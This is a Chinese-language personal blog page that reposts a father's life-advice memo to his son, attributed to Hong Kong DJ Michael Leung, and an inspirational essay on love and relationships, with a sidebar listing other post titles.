    作者介紹─ 
    梁繼璋(1955年8月17日-),英文名Michael,前香港電台第二台節目主持人,
    也是一位名DJ、作家,曾從事廣告、電視台等媒體創作。因其柔和、磁性的聲線,
    令他讀文章時更有氣氛、更容易令聽眾投入。 
    ---------------------------------------------------------------------------------------
    我兒: 
    寫這備忘錄給你,基於三個原則: 
    (一)人生福禍無常,誰也不知可以活多久,有些事情還是早一點說好。 
    (二)我是你的父親,我不跟你說,沒有人會跟你說。 
    (三)這備忘錄裏記載的,都是我經過慘痛失敗得回來的體驗,可以為你的成長省回不少冤枉路。 
    以下,便是你在人生中要好好記住的事: 
    (一)對你不好的人,你不要太介懷,在你一生中,沒有人有義務要對你好,除了我和你媽媽。 
                至於那些對你好的人,你除了要珍惜、感恩外,也請多防備一點,因為,每個人做每件事,
                總有一個原因,他對你好,未必真的是因為喜歡你,請你必須搞清楚,而不必太快將對方看作真朋友。 
    (二)沒有人是不可代替,沒有東西是必須擁有。看透了這一點,將來你身邊的人不再要你,
                或許失去了世間上最愛的一切時,也應該明白,這並不是甚麼大不了的事。 
    (三)生命是短暫的,今日你還在浪費著生命,明日會發覺生命已遠離你了。因此,愈早珍惜生命,
                 你享受生命的日子也愈多,與其盼望長壽,倒不如早點享受。 
    (四)世界上並沒有最愛這回事,愛情只是一種霎時的感覺,而這感覺絕對會隨時日、心境而改變。
                如果你的所謂最愛離開你,請耐心地等候一下,讓時日慢慢沖洗,讓心靈慢慢沉澱,
                你的苦就會慢慢淡化。不要過分憧憬愛情的美,不要過分誇大失戀的悲。 
    (五)雖然,很多有成就的人士都有受過很多教育,但並不等如不用功讀書,就一定可以成功。
                你學到的知識,就是你擁有的武器。人,可以白手興家,但不可以手無寸鐵,緊記! 
    (六)我不會要求你供養我下半輩子,同樣地我也不會供養你的下半輩子,當你長大到可以獨立的時候,
                 我的責任已經完結。以後,你要坐巴士還是Benz,吃魚翅還是粉絲,都要自己負責。 
    (七)你可以要求自己守信,但不能要求別人守信,你可以要求自己對人好,但不能期待人家對你好。
                 你怎樣對人,並不代表人家就會怎樣對你,如果看不透這一點,你只會徒添不必要的煩惱。 
    (八)我買了十多二十年六合彩,還是一窮二白,連三獎也沒有中,這證明人要發達,
                 還是要努力工作才可以,世界上並沒有免費午餐。 
    (九)親人只有一次的緣份,無論這輩子我和你會相處多久,也請好好珍惜共聚的時光,
               下輩子,無論愛與不愛,都不會再見。 
    你的爸爸梁繼璋
    (繼續閱讀...)
    文章標籤

    雪 薄草 發表在 痞客邦 留言(0) 人氣(4)

    • 個人分類:文章
    ▲top
    • 5月 25 週二 201000:52
    • 不要隨便牽手,更不要隨便放手

    不管你有沒有男朋友,有沒有女朋友,都過來把它讀完,寫的真是那麼回事 

    你發覺了嗎? 

    愛的感覺,總是在一開始覺得很甜蜜,
    總覺得多一個人陪、多一個人幫你分擔, 
    你終於不再孤單了,至少有一個人想著你、 
    戀著你,不論做什麼事情, 
    只要能一起,就是好的.... 

    ....但是慢慢的,隨著彼此的認識愈深, 
    你開始發現了對方的缺點, 
    於是問題一個接著一個發生, 
    你開始煩、累,甚至想要逃避, 
    有人說愛情就像在撿石頭, 
    總想撿到一個適合自己的, 
    但是你又如何知道什麼時候能夠撿到呢? 
    他/她適合你,那你又適合他/她嗎? 

    其實,愛情就像磨石子一樣, 
    或許剛撿到的時候,你不是那麼的滿意, 
    但是記住人是有彈性的, 
    很多事情是可以改變的, 
    只要你有心、有勇氣, 
    與其到處去撿未知的石頭, 
    還不如好好的將自己已經擁有的石頭磨亮,你開始磨了嗎? 
    很多人以為是因為感情淡了, 
    所以人才會變得懶惰。 
    錯! 
    其實是人先被惰性征服, 
    所以感情才會變淡的。 

    在某個聚餐的場合, 
    有人提議多吃點蝦對身體好, 
    這時候有個中年男人忽然說「十年前,當我老婆還是我的女朋友的時候,她說要吃十隻蝦,我就剝二十只給她! 
    現在,如果她要我幫她剝蝦殼,開玩笑!我連幫她脫衣服都沒興趣了,還剝蝦殼咧!」 
    聽到了嗎?明白了嗎? 

    難怪越來越多人只想要談一輩子的戀愛, 
    卻遲遲不肯走入婚姻。 
    因為,婚姻容易讓人變得懶惰。 

    如果每個人都 
    懶得講話、 
    懶得傾聽、 
    懶得製造驚喜、 
    懶得溫柔體貼, 
    那麼夫妻或是情人之間, 
    又怎麼會不漸行漸遠漸無聲呢? 


    *所以請記住: 
    有活力的愛情, 
    是需要適度殷勤灌溉的, 
    談戀愛,更是不可以偷懶的喔! 

    有一對情侶,相約下班後去用餐、逛街, 
    可是女孩因為公司會議而延誤了, 
    當她冒著雨趕到的時候已經遲到了30多分鐘, 
    他的男朋友很不高興的說: 
    你每次都這樣,現在我甚麼心情也沒了, 
    我以後再也不會等你了! 
    刹那間,女孩終於決堤崩潰了, 
    她心裏在想:或許,他們再也沒有未來了 

    同樣的在同一個地點,另一對情侶也面臨同樣的處境; 
    女孩趕到的時候也遲到了半個鐘頭, 
    他的男朋友說:「我想你一定忙壞了吧!」 
    接著他為女孩拭去臉上的雨水,並且脫去外套蓋在女孩身上, 
    此刻,女孩流淚了 
    但是流過她臉頰的淚卻是溫馨的。 



    你體會到了嗎? 
    其實愛、恨往往只是在我們的一念之間! 
    愛不僅要懂得寬容更要及時, 
    很多事可能只是在於你心境的轉變罷了! 
    懂了嗎? 
    當有個人愛上你,而你也覺得他不錯。 
    那並不代表你會選擇他。 

    我們總說:「我要找一個自己很愛很愛的人,才會談戀愛。」 
    但是當對方問你,怎樣才算是很愛很愛的時候, 
    你卻無法回答他,因為你自己也不知道。 

    沒錯,我們總是以為,我們會找到一個自己很愛很愛的人。 
    可是後來,當我們猛然回首,我們才會發覺自己曾經多麼天真。 
    假如從來沒有開始,你怎麼知道自己會不會很愛很愛那個人呢? 
    其實,很愛很愛的感覺,是要在一起經歷了許多事情之後才會發現的。 
    或許每個人都希望能夠找到自己心目中百分之百的伴侶, 
    但是你有沒有想過『在你身邊會不會早已經有人默默對你付出很久了,只是你沒發覺而已呢?』 
    所以,還是仔細看看身邊的人吧!他或許已經等你很久了 

    當你愛一個人的時候,愛到八分絕對剛剛好。 
    所有的期待和希望都只有七八分;剩下兩三分用來愛自己。 
    如果你還繼續愛得更多,很可能會給對方沉重的壓力,讓彼此喘不過氣來, 
    完全喪失了愛情的樂趣。 

    所以請記住, 
    喝酒不要超過六分醉, 
    吃飯不要超過七分飽, 
    愛一個人不要超過八分 

    如果你也正在為愛迷惘,或許下面這段話可以給你一些啟示: 


    愛一個人,要瞭解,也要開解; 
    要道歉,也要道謝; 
    要認錯,也要改錯; 
    要體貼,也要體諒; 
    是接受,而不是忍受; 
    是寬容,而不是縱容; 
    是支持,而不是支配; 
    是慰問,而不是質問; 
    是傾訴,而不是控訴; 
    是難忘,而不是遺忘; 
    是彼此交流,而不是凡事交代; 
    是為對方默默祈求, 
    而不是向對方諸多要求; 
    可以浪漫,但不要浪費; 

    不要隨便牽手, 更不要隨便放手


    出處 : http://man.yam.com/article.aspx?asn=10389
    (繼續閱讀...)
    文章標籤

    雪 薄草 發表在 痞客邦 留言(0) 人氣(5)

    • 個人分類:文章
    ▲top
    12...4»

    自訂側欄

    自訂側欄

    個人資訊

    雪 薄草
    暱稱:
    雪 薄草
    分類:
    不設分類
    好友:
    累積中
    地區:

    熱門文章

    • (1,198)如何編譯 pyd 檔 (for Windows)
    • (15,836)should be 的用法和單個 be 的用法
    • (405)簽署 Java Applet 認證的方式

    文章分類

    • 音樂 (4)
    • Language (1)
    • AJAX (4)
    • Windows 指令 (1)
    • Linux 指令 (3)
    • JavaScript (2)
    • Java Applet (2)
    • JAVA (1)
    • 健康 (1)
    • Python (2)
    • 文章 (4)
    • 知識 (8)
    • Web安全 (4)
    • 笨蛋的英文筆記 (3)
    • 未分類文章 (1)

    最新文章

    • 10 tips for perfect pronunciation/10種完美發英的秘訣 (中英對照 精華文章)
    • 『資料隱碼』SQL Injection的源由與防範之道
    • SQL Injection – 駭客的 SQL填空遊戲(下)
    • SQL Injection (資料隱碼)– 駭客的 SQL填空遊戲(上)
    • XSS攻擊防禦技術白皮書
    • 卡內基的人生態度 -- 不批評、不責備、不抱怨
    • 一生受用的話
    • 如果你已經二十歲了,別再孩子氣了 - 李開復
    • 給孩子的備忘錄
    • 不要隨便牽手,更不要隨便放手

    動態訂閱

    文章精選

    文章搜尋

    誰來我家

    參觀人氣

    • 本日人氣:
    • 累積人氣: